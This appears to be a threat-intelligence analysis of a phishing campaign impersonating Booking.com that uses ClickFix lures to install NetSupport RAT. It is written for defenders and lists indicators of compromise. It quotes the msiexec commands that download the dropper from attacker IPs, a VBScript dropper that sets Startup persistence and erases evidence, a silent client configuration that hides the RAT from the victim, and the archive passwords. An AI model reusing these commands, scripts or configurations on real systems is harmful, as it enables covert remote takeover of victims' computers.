• Reading time : “10 min”

ClickFix Phishing Campaign Delivering NetSupport RAT

A multi-stage attack chain leveraging fake property review portals, ClickFix social engineering, and a custom MSI dropper to establish persistent remote access via NetSupport Manager.

Executive Summary

A threat actor is operating a sophisticated phishing campaign impersonating Booking.com, directing victims to fraudulent property review portals. A ClickFix lure tricks users into executing a malicious msiexec command that downloads and installs a custom MSI dropper from attacker-controlled IP addresses. The dropper deploys a VBScript installer that extracts password-protected archives, establishes persistence via the Windows Startup folder, and launches a silently configured NetSupport Manager client, granting the attacker full remote access to compromised machines. All staging files are deleted upon completion to impede forensic investigation. Two C2 domains masquerade as CDN infrastructure to blend into normal network traffic.

Initial Delivery — ClickFix Phishing

Phishing Infrastructure

Two phishing sites are confirmed as entry points. Both impersonate the Booking.com brand and present victims with a fraudulent property review or verification flow:

phishing Booking web site

URLRole
captcha-extranet-manage.com/start/Primary lure — CAPTCHA-style ClickFix gate
review-your-property.comSecondary lure — property review portal theme

ClickFix Technique

ClickFix is a social engineering technique where a fake verification or CAPTCHA prompt instructs the victim to open the Windows Run dialog (Win+R) and paste a command that has been placed on their clipboard by the malicious page. This bypasses browser download warnings entirely — the victim believes they are completing a human verification step.

The Clickfix CMD

In this campaign, the ClickFix prompt delivers a msiexec command that downloads and silently installs the first-stage dropper directly from the attacker’s server. See the detonation of the full infection chain on ANY.RUN.

# Primary payload server
"C:\WINDOWS\system32\msIeXec.exe" -PᵃcKAGE hxxp://77[.]91[.]97[.]125/BookingVerifedCasBot /Q

# Secondary payload server (redundancy)
"C:\WINDOWS\system32\msIeXec.ExE" -PᵃcKᵃGE hxxp://147[.]45[.]45[.]238/genius-user /Q

MSI dropper cmd

ClickFix Backend — Dynamic Command Delivery

Static analysis of the HTTP traffic in the sandbox reveals the phishing page does not hardcode the msiexec command in the HTML. Instead, the page makes a live request to a server-side PHP endpoint to fetch the payload command at runtime:

GET /send_telegram.php?get_command=1

The server responds with a JSON object containing the full msiexec command, pre-obfuscated with Unicode superscript characters, ready to be written to the victim’s clipboard:

{
  "status": "success",
  "command": "msIeXec.ExE -P\u1d43cK\u1d43GE hxxp:\/\/147[.]45[.]45[.]238\/genius-user \/Q",
  "filename": "",
  "b64content": "",
  "verification_id": "vid_6a02ccdef0be59.95511780",
  "country": "Italy"
}

send_telegram.php API response in ANY.RUN

Several aspects of this response are significant:

FieldValueSignificance
commandmsiexec with Unicode lurePayload is served dynamically — can be swapped per victim or campaign phase
verification_idvid_6a02ccdef0be59.95511780Per-victim tracking token, likely used to mark the victim as “clicked”
countryItalyServer performs geolocation — different payloads or commands may be served per region
b64content(empty)Reserved field — may carry base64-encoded alternate payloads in other campaign variants
endpoint namesend_telegram.phpStrong indicator the server also dispatches a Telegram bot notification to the operator when a victim hits the ClickFix gate

The send_telegram.php endpoint name is a consistent pattern seen in ClickFix campaigns where threat actors use a Telegram bot as an out-of-band notification channel, alerting them in real time when a victim has been successfully lured into executing the command.

MSI Dropper Analysis

The MSI file is retrieved from the attacker’s distribution server and is presented to the system as a 7-Zip Archive Package installer — a common masquerading technique where a legitimate tool’s installer metadata is reused to wrap malicious content.

the dropper files

Static analysis reveals the MSI contains five nested payload components inside ZIP containers: a shortcut payload LnkPayload, a PE executable ExePayload, a PE DLL DllPayload, an alternate payload AltPayload and a vbs file init.vbs. All four are delivered as the contents of the password-protected 7z archives extracted by init.vbs.

On another AnyRun submission we can see that the initial file lands on disk with a .fpx extension to prevent browser or AV classification. An embedded PowerShell step renames it to .fpx.msi immediately before msiexec invocation: ANY.RUN’s.

All these files were renamed while downloaded from the MSI cmd: The Click fix MSI FileModif

  • init.vbs — Orchestration script

The conductor of the entire post-installation phase. Written by the MSI Custom Action and immediately launched by wscript.exe (SysWOW64, 32-bit) in hidden window mode. Its five responsibilities execute sequentially: extract persistence shortcut, extract RAT payload, launch RAT, wait 2 seconds, delete all evidence including itself.

Excerpt from this VBS script code:

Set shell = CreateObject("WScript.Shell")

localAppData   = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%")
sysinfoDir     = localAppData & "\sysinfo"
startupDir     = shell.SpecialFolders("Startup")
programDataDir = shell.ExpandEnvironmentStrings("%ProgramData%") & "\sysinfo"

cmd = """" & sysinfoDir & "\7z.exe"" x " & _
      """" & sysinfoDir & "\lnk.7z"" " & _
      "-plimosik -aoa -y " & _
      "-o""" & startupDir & """"

shell.Run cmd, 0, True

cmd = """" & sysinfoDir & "\7z.exe"" x " & _
      """" & sysinfoDir & "\grace.7z"" " & _
      "-pfantombot -aoa -y " & _
      "-o""" & programDataDir & """"

shell.Run cmd, 0, True

lnkPath = startupDir & "\sysinfo.lnk"
shell.Run """" & lnkPath & """", 0, False

WScript.Sleep 2000

Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
fso.DeleteFile sysinfoDir & "\7z.exe", True
fso.DeleteFile sysinfoDir & "\7z.dll", True
fso.DeleteFile sysinfoDir & "\grace.7z", True
fso.DeleteFile sysinfoDir & "\lnk.7z", True
fso.DeleteFile sysinfoDir & "\init.vbs", True
On Error GoTo 0

See all on the interactive Sandbox analysis ANY.RUN’s.

  • grace.7z — Main payload archive

The largest and most significant file. A password-protected 7-Zip archive (password: fantombot) containing the complete NetSupport Manager client package. When extracted by init.vbs, it unpacks to C:\ProgramData\sysinfo\ and delivers the full RAT including sysinfo.exe (the renamed client32.exe), supporting DLLs, and client32.ini with hardcoded C2 configuration.

  • lnk.7z — Persistence shortcut archive

A tiny 450-byte password-protected archive (password: limosik) containing a single Windows shortcut file: sysinfo.lnk. This is extracted directly into the Windows Startup folder, establishing persistence. On every subsequent user login, the shortcut silently launches C:\ProgramData\sysinfo\sysinfo.exe, reconnecting the NetSupport RAT to its C2 without any user interaction or visible window.

  • 7z.exe — Archive extraction utility

A legitimate copy of the 7-Zip command-line executable, used purely as a tool to extract the two password-protected payload archives. Its presence is entirely instrumental — the attacker bundles it inside the MSI because the victim machine cannot be assumed to have 7-Zip installed. Using a legitimate, signed binary for this purpose is a living-off-the-land adjacent technique: the extraction itself generates no malicious process signatures since 7z.exe is a trusted tool.

  • 7z.dll — 7-Zip core library

The core compression/decompression library that 7z.exe depends on at runtime. Without it, 7z.exe cannot function. The threat actor bundles both files together inside the MSI to ensure a self-contained extraction environment with no external dependencies. Like 7z.exe, this is a legitimate binary used as an operational tool rather than a malicious payload.

C2 Infrastructure — NetSupport RAT Configuration

The final payload is a NetSupport Manager client configured to connect to two attacker-operated gateways over port 443, blending with HTTPS traffic. The configuration disables all user-facing controls, making the RAT completely invisible to the victim.


[HTTP]
GatewayAddress=img-pulse-cache.com:443 or uurdxji.com:443
SecondaryGateway=booking-static-assets.com:443 or yuaushg.com:443
Port=443
SecondaryPort=443
gsk=GN;O@MDN9E=LBFGI=C@E     ; obfuscated shared key
gskmode=0

[Client]
silent=1               ; no UI
SysTray=0             ; no system tray icon
ShowUIOnConnect=0      ; invisible when attacker connects
DisableDisconnect=1    ; victim cannot disconnect
RoomSpec=Eval          ; campaign/group identifier
Usernames=*            ; any attacker can authenticate

See all on the interactive Sandbox analysis file client32.ini ANY.RUN’s.

Attacker capabilities once connected. With NetSupport Manager installed and connecting, the threat actor has access to: full desktop view and interactive control, file system browsing and transfer, remote command execution, keylogging, screenshot capture, and session recording. The victim has no indication of access and cannot disconnect the client.

TI research on ANY.RUN reveals this campaign extends well beyond the two submissions analyzed above. Multiple independent detonations share the same C2 infrastructure while rotating dropper IPs and impersonating different brands, indicating an active, maintained ClickFix-as-a-kit operation.

DateDropper IPC2 OverlapReport
2026-05-1377.91.97.12591.92.34.113ANY.RUN
2026-05-12147.45.45.23895.85.246.53ANY.RUN
2026-05-05217.145.226.11991.92.34.113ANY.RUN

The consistent reuse of C2 infrastructure across varying lure themes and dropper endpoints is a strong indicator of a single threat actor operating a commoditized ClickFix kit. IP rotation at the dropper layer suggests awareness of blocklist-based defenses, while C2 stability may indicate the actor prioritizes operational continuity over anonymity at the post-exploitation phase.

Indicators of Compromise

Network — Phishing Domains

TypeIndicator
DOMAINcaptcha-extranet-manage[.]com
DOMAINreview-your-property[.]com

Network — Payload Distribution

TypeIndicator
IP77.91.97.125
IP147.45.45.238
IP217.145.226.119
URLhxxp://77[.]91[.]97[.]125/BookingVerifedCasBot
URLhxxp://147[.]45[.]45[.]238/genius-user
URL PATTERN/send_telegram.php?get_command=1 (ClickFix dynamic command delivery endpoint)

Network — C2 Infrastructure

TypeIndicator
DOMAINimg-pulse-cache[.]com
DOMAINuurdxji[.]com
DOMAINbooking-static-assets[.]com
DOMAINyuaushg[.]com
IP91.92.34.113
IP95.85.246.53
PORT443/TCP (NetSupport gateway protocol)

File Hashes — MSI Dropper

TypeHash
MD59C4E14DB8CFB10AE8D9F1BB477144461
SHA1EA392CC47E918E28A3B4163CD7FBE474B749F740
SHA2569FC308606F49A3E319E881E6DD92B534881FFB37AA6939D38E1E882470CCE2AB

File Hashes — Staged Files (Dropped by msiexec)

TypeHashFile
MD5c738b27e7a8b9dbfcf3fcece495ab525grace.7z (NetSupport payload archive)
MD595c6515d88e9ea48a9b949a81c1dac4e7z.dll
MD558712aacf6b0f8149c066bda3a034fc37z.exe
MD564e2ca1f0d2123fdfbc6dbd04a9bfb73lnk.7z (persistence shortcut archive)

Filesystem Artifacts

TypePath / File
PATH%LOCALAPPDATA%\sysinfo\
PATH%LOCALAPPDATA%\sysinfo\7z.exe
PATH%LOCALAPPDATA%\sysinfo\7z.dll
PATH%LOCALAPPDATA%\sysinfo\init.vbs (may be deleted by time of investigation)
PATH%ProgramData%\sysinfo\
PATH%ProgramData%\sysinfo\sysinfo.exe (renamed client32.exe)
PATH%ProgramData%\sysinfo\client32.ini
PATH[Startup]\sysinfo.lnk

Behavioral Signatures

TypeValue
CMDmsiexec -PᵃcKAGE hxxp:// (Unicode lure flag)
CMDwscript.exe %LOCALAPPDATA%\sysinfo\init.vbs (hidden window, SysWOW64)
CMD7z.exe x *.7z -plimosik
CMD7z.exe x grace.7z -pfantombot
EXT.fpx.fpx.msi (rename before msiexec invocation)
STRINGRoomSpec=Eval (in client32.ini)
STRINGGN;O@MDN9E=LBFGI=C@E (NetSupport GSK value)

Credentials / Campaign Config

TypeValueContext
PASSWORDfantombotArchive password for grace.7z (RAT payload)
PASSWORDlimosikArchive password for lnk.7z (persistence shortcut)